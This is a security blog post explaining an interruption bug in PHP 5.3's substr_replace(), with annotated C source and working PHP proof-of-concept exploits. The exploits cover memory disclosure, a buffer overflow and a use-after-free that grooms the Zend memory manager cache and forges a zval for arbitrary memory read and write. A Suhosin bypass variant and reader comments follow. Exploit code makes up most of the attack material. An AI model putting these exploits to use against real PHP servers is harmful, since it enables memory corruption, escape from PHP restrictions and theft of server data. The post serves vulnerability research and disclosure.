Saturday, January 21, 2012

Interruption in PHP substr_replace()

I reported this bug a few months ago (#55871). A simple PoC is in the test script on the bug page. It has been fixed only in the 5.4 branch. The main use of this bug is post-exploitation, as discussed in Stefan Esser's slides and paper. If you are not familiar with PHP's internal structures, please read Stefan Esser's paper or slides first, because I will not cover them here.

Affected versions: 5.3.x

First, I will explain the bug as I did in the test script. The code for substr_replace() is long. Here is the link to the vulnerable code in string.c. Below I show only the relevant part.

    // ...
    // if a parameter is an array, no conversion at the beginning of function
    // ...
    if (Z_TYPE_PP(str) != IS_ARRAY) {
        // ...
    } else { /* str is array of strings */
        // ...
        while (zend_hash_get_current_data_ex(Z_ARRVAL_PP(str), (void **) &tmp_str, &pos_str) == SUCCESS) {
            zval *orig_str;
            zval dummy;
            if(Z_TYPE_PP(tmp_str) != IS_STRING) {
                dummy = **tmp_str;
                orig_str = &dummy;
            } else {
                orig_str = *tmp_str; // [1]
            }

            // get and check 'from' value to 'f' (convert_to_long if needed)
            // get and check 'len' value to 'l' (convert_to_long if needed)
            // ...
            if ((f + l) > Z_STRLEN_P(orig_str)) {
                l = Z_STRLEN_P(orig_str) - f;  // [2]
            }

            result_len = Z_STRLEN_P(orig_str) - l;

            if (Z_TYPE_PP(repl) == IS_ARRAY) {
                if (SUCCESS == zend_hash_get_current_data_ex(Z_ARRVAL_PP(repl), (void **) &tmp_repl, &pos_repl)) {
                    zval *repl_str;
                    zval zrepl;
                    if(Z_TYPE_PP(tmp_repl) != IS_STRING) {
                        zrepl = **tmp_repl;
                        repl_str = &zrepl;
                        convert_to_string(repl_str);  // [3] interruption
                    } else {
                        repl_str = *tmp_repl;
                    }

                    result_len += Z_STRLEN_P(repl_str);
                    zend_hash_move_forward_ex(Z_ARRVAL_PP(repl), &pos_repl);
                    result = emalloc(result_len + 1);

                    memcpy(result, Z_STRVAL_P(orig_str), f);
                    memcpy((result + f), Z_STRVAL_P(repl_str), Z_STRLEN_P(repl_str));
                    memcpy((result + f + Z_STRLEN_P(repl_str)), Z_STRVAL_P(orig_str) + f + l, Z_STRLEN_P(orig_str) - f - l); // [4]
                    if(Z_TYPE_PP(tmp_repl) != IS_STRING) {
                        // ...
                    }
                } else {
                    // ...
                }
            } else {
                // ...
            }

            result[result_len] = '\0';
            add_next_index_stringl(return_value, result, result_len, 0);
            if(Z_TYPE_PP(tmp_str) != IS_STRING) {
                zval_dtor(orig_str);  // [5]
            }
            zend_hash_move_forward_ex(Z_ARRVAL_PP(str), &pos_str);
        } /* while */
    } /* if */

At [1], if 'tmp_str' is a string, 'tmp_str' and 'orig_str' point to the same zval. After this point, the program assumes that the type of 'orig_str' is string.

At [3], if 'repl_str' is an object, convert_to_string() will call its __toString() magic method. So if we pass 'str' by reference, using the call-time pass-by-reference feature or a reference inside an array (see below), we can access and modify the value of 'orig_str' inside __toString().
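
The pattern behind [1] to [4] can be reduced to a toy model. This is only a sketch and not PHP's code: `toy_str`, `toy_append` and `toy_stale_overrun` are hypothetical names, and the callback stands in for __toString(). It shows how a length cached before the callback goes stale once user code has changed the string.

```c
#include <stddef.h>
#include <string.h>

/* Toy stand-in for a string zval: just a buffer and its length. */
struct toy_str {
    char buf[64];
    size_t len;
};

/* Hypothetical callback type standing in for __toString(). */
typedef void (*toy_callback)(struct toy_str *s);

/* Callback that grows the string, like `$my_var .= 'AAAAAAAA'`. */
static void toy_append(struct toy_str *s)
{
    memcpy(s->buf + s->len, "AAAAAAAA", 8);
    s->len += 8;
}

/*
 * Returns how many bytes a later copy of the whole string would overrun
 * a buffer that was sized from the length cached before the callback ran.
 */
static size_t toy_stale_overrun(struct toy_str *s, toy_callback cb)
{
    size_t cached_len = s->len;   /* like result_len, computed early */
    cb(s);                        /* interruption: user code runs here */
    return s->len > cached_len ? s->len - cached_len : 0;
}
```

With a 40-byte string and the appending callback, the cached length is 40 while the string is 48 bytes long afterwards, so a copy sized from the cached value is 8 bytes too small.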

At [5], because of the interruption at [3], we can trick the program into freeing memory that a variable still references (use-after-free). Now look at the first PoC.

class dummy {
    public function __toString() {
        //$GLOBALS['my_var'] += 0x08048000; // dump memory at 0x08048000
        //$GLOBALS['my_var'] .= 'AAAAAAAA'; // buffer overflow
        preg_match('//', '', $GLOBALS['my_var']); // dump HashTable data (and use-after-free in >=5.3.7)
        return '';
    }
}

$my_var = str_repeat('A', 40);
$out = substr_replace(array(&$my_var), array(new dummy), 40, 0);

To dump memory at any address, just convert $my_var to an integer (see the zval struct for why). If we append a string to $my_var, the memcpy() at [4] will cause a buffer overflow, because the length of 'orig_str' is modified after 'result_len' is computed.
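
The reason the integer conversion works is that a zval keeps its payload in a union, so the integer value and the string pointer share the same storage. The following is a simplified sketch of that idea, not the real Zend definitions: the `toy_` names are hypothetical, and `intptr_t` is used in place of `long` so the example also behaves on 64-bit builds.

```c
#include <stdint.h>

/* Simplified stand-in for zvalue_value: all members share one storage. */
union toy_value {
    intptr_t lval;                          /* integer payload */
    struct { char *val; int len; } str;     /* string payload */
};

struct toy_zval {
    union toy_value value;
    unsigned char type;   /* says which union member is valid */
};

enum { TOY_LONG = 1, TOY_STRING = 6 };

/* Code that still believes the value is a string reads value.str.val. */
static const char *toy_read_as_string(const struct toy_zval *z)
{
    return z->value.str.val;
}
```

If the value is changed to an integer holding an address while the caller still treats it as a string, the address is used as the string pointer. That is what happens to 'orig_str' after the interruption.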

The most interesting case is when $my_var is converted to an array. The output then contains the HashTable struct. Also (for versions >= 5.3.7), the array (the HashTable, the Buckets and the array of pointers to Buckets) is freed. So after calling substr_replace(), we just need to allocate crafted strings over the freed HashTable, Buckets and array of pointers to Buckets. Then we create a fake zval with length 0x7fffffff. Finally, we can read and write any memory address.

To make the use-after-free exploit reliable (with my method), we need to understand a little about the Zend memory manager's cache. The code is in Zend/zend_alloc.c. The important functions are _zend_mm_alloc_int() and _zend_mm_free_int(), and only the code related to small blocks matters. Here is a brief summary.

  1. When efree() is called, the memory is not actually freed. Instead, it is moved to the free-list cache.
  2. There is an array of singly linked lists that keep freed memory blocks. Each linked list keeps blocks of the same size.
  3. When a memory block is freed, it is moved to the head of its linked list.
  4. When a memory block is allocated, it is taken from the head of the linked list if the list is not empty.
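
The four points above can be sketched as a tiny allocator. This is a toy model under my own assumptions, not the code from Zend/zend_alloc.c: all `toy_` names are hypothetical, size classes are simply multiples of 8 bytes, and the caller passes the size to `toy_free()`, whereas the real allocator reads it from the block header.

```c
#include <stddef.h>
#include <stdlib.h>

#define TOY_NUM_CLASSES 32
#define TOY_ALIGN 8

/* A freed block stores the link to the next free block in its own memory. */
struct toy_free_block {
    struct toy_free_block *next;
};

/* One singly linked list of cached blocks per size class. */
static struct toy_free_block *toy_cache[TOY_NUM_CLASSES];

/* Map a request size to a size-class index (sizes rounded up to 8 bytes). */
static size_t toy_class(size_t size)
{
    return (size + TOY_ALIGN - 1) / TOY_ALIGN;
}

static void *toy_alloc(size_t size)
{
    size_t idx = toy_class(size);
    if (idx < TOY_NUM_CLASSES && toy_cache[idx] != NULL) {
        /* Reuse the most recently freed block of this class. */
        struct toy_free_block *b = toy_cache[idx];
        toy_cache[idx] = b->next;
        return b;
    }
    /* Cache miss: fall back to the system allocator. */
    if (idx == 0) {
        idx = 1;
    }
    return malloc(idx * TOY_ALIGN);
}

static void toy_free(void *ptr, size_t size)
{
    size_t idx = toy_class(size);
    if (idx == 0 || idx >= TOY_NUM_CLASSES) {
        free(ptr);   /* not cacheable in this toy model */
        return;
    }
    /* Push the block onto the head of its list instead of releasing it. */
    struct toy_free_block *b = ptr;
    b->next = toy_cache[idx];
    toy_cache[idx] = b;
}
```

Because each list behaves like a stack, the block freed last is the first one returned for the next request of the same size class. This is why the order of the string allocations after the free matters.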

The plan is to allocate strings of the same size as the HashTable, Bucket and arBuckets until they land on the freed array. Then use the addresses from the substr_replace() output to repair everything. Here is the code for 32-bit without the Suhosin patch.

class dummyht {
    public function __toString() {
        preg_match('//', '', $GLOBALS['my_var']);
        return "";
    }
}

// hashtable and bucket size is 40
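// arBuckets size is 32
// NOTE: $h, used below, is not defined in this listing; it is a string whose length matches the HashTable and Bucket size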
$b = "ararararararararararararararar";
$fake_ht = "\x00\x00\x00\x07\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00".str_repeat("\x00", 23);
$fake_bk = str_repeat("\x00", 38);
$fake_arb = "ararararararararararararar";
$junk = array(0=>'0',1=>'1',2=>'2',3=>'3',4=>'4',5=>'5',6=>'6',7=>'7');
$str_arr = array('ht'=>"\x08", 'arBks'=>"\x00", 'bk0'=>"\x00");
$my_var = str_repeat("A", 80);
$data = 0;
$data = substr_replace(array(&$my_var), array(new dummyht), 80, 0);
$junk[0] .= $h;
$junk[1] .= $h;
$junk[2] .= $h;
$junk[3] .= $h;
$junk[4] .= $h;
$str_arr['ht'] .= $fake_ht;
$str_arr['bk0'] .= $fake_bk;
$junk[5] .= $b;
$junk[6] .= $b;
$junk[7] .= $b;
$str_arr['arBks'] .= $fake_arb;
$ht = parse_hashtable($data[0]);
// repair hashtable
for ($i = 16; $i < 32; $i++) $str_arr['ht'][$i] = $data[0][$i];
for ($i = 36; $i < 39; $i++) $str_arr['ht'][$i] = $data[0][$i];
// repair arBuckets
for ($i = 0; $i < 4; $i++) $str_arr['arBks'][$i] = $data[0][$i+4*4];
for ($i = 4; $i < 4*7; $i++) $str_arr['arBks'][$i] = "\x00";

// create $fake_zval string in tail of arBuckets
$fake_zval  = pack("I", $ht['arBuckets'] & 0x80000000);
$fake_zval .= pack("I", 0x7fffffff);
$fake_zval .= pack("I", 1);
$fake_zval .= "\x06\x00";

for ($i = 0; $i < strlen($fake_zval); $i++)
    $str_arr['arBks'][$i+4*4] = $fake_zval[$i];

// repair first bucket
$sptr = pack("I", $ht['pListHead'] + 4*3);
for ($i = 0; $i < 4; $i++) $str_arr['bk0'][$i + 4*2] = $sptr[$i];
$sptr = pack("I", $ht['arBuckets'] + 4*4);
for ($i = 0; $i < 4; $i++) $str_arr['bk0'][$i + 4*3] = $sptr[$i];

$mem = &$my_var[0];
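
The 14 bytes of $fake_zval follow the layout of a 32-bit zval holding a string. The sketch below builds the same byte sequence in C to make the field order explicit. It is an illustration only: `toy_build_fake_zval` is a hypothetical helper, and the field sizes assume the 32-bit PHP 5.3 layout (value.str.val, value.str.len, refcount, type, is_ref).

```c
#include <stdint.h>
#include <string.h>

#define TOY_IS_STRING 6  /* value of IS_STRING in PHP 5.3 */

/*
 * Writes the 14 bytes that the PoC concatenates for $fake_zval on a
 * 32-bit build. Fields are copied in native byte order, like pack("I").
 */
static size_t toy_build_fake_zval(unsigned char out[14], uint32_t str_val)
{
    uint32_t str_len = 0x7fffffff;   /* huge length, as in the PoC */
    uint32_t refcount = 1;

    memcpy(out + 0, &str_val, 4);    /* value.str.val */
    memcpy(out + 4, &str_len, 4);    /* value.str.len */
    memcpy(out + 8, &refcount, 4);   /* refcount */
    out[12] = TOY_IS_STRING;         /* type */
    out[13] = 0;                     /* is_ref */
    return 14;
}
```

A string zval with this length lets ordinary string offsets such as $my_var[$i] reach far beyond the original buffer.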

With the Suhosin patch, the above method of dumping memory and dumping the HashTable does not work, because the patch always sets str.len to 0 when clearing a string variable. At [4], the copy length will then be negative, but it is cast to unsigned for memcpy(). The workaround for this problem is to use [2]. I pass the len parameter as an object to cause the interruption before [2]. After convert_to_long(), 'len' and Z_STRLEN_P(orig_str) are both 0. At [2], 'l' will be 0. Problem fixed :]. Here is the PoC.

class dummy {}
function errhandler() {
    $GLOBALS['my_var'] = ''; // to make it work when no suhosin patch
    preg_match('//', '', $GLOBALS['my_var']);
    return true;
}

$my_var = str_repeat('A', 40);
$oldhandler = set_error_handler("errhandler");
$out = substr_replace(array(&$my_var), '', 40, array(new dummy));
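
The negative copy length at [4] mentioned above can be illustrated in isolation. This is a minimal sketch with hypothetical helper names. The values are illustrative and assume that the string length was reset to 0 after 'f' had already been set to 40.

```c
#include <stddef.h>

/* Tail length as computed at [4]: all operands are signed ints. */
static int toy_tail_len(int str_len, int f, int l)
{
    return str_len - f - l;
}

/* What memcpy() receives: the same value converted to size_t. */
static size_t toy_memcpy_len(int str_len, int f, int l)
{
    return (size_t)toy_tail_len(str_len, f, l);
}
```

With str_len = 0, f = 40 and l = 0 the signed result is -40. Converted to size_t it becomes a very large count, so memcpy() would run far past both buffers instead of copying nothing.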


  1. really good article!
    Subscribed to this blog!

  2. Can you show the parse_hashtable function?
    Also, I don't understand something.
    If $h is a string to be allocated on a freed hashtable and $b a string to be allocated on a freed arBuckets, what are these vars for?

    $fake_ht = "\x00\x00\x00\x07\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00".str_repeat("\x00", 23);
    $fake_bk = str_repeat("\x00", 38);
    $fake_arb = "ararararararararararararar";


  3. parse_hashtable() is just a function that parses the memory dump (string) into a HashTable.
    $h is just a string whose length is the same as the HashTable and Bucket size.

    I recommend reading Esser's paper or slides first. Lastly, the debugger is your friend. Use it. You will get all the answers from the debugger.

  4. I've read Esser's paper.
    I've understood 90% of it, but I haven't coded in C for years, and I don't even know how I could debug this easily, because I'm not very familiar with the tools...

    Any hints on how I could debug this easily?
    Any help is appreciated! thanks!

  5. Do these 3 lines seem OK to you? What's the point of separating a zval if it's a reference?

    if (Z_ISREF_PP(str)) {
        SEPARATE_ZVAL(str);
    }
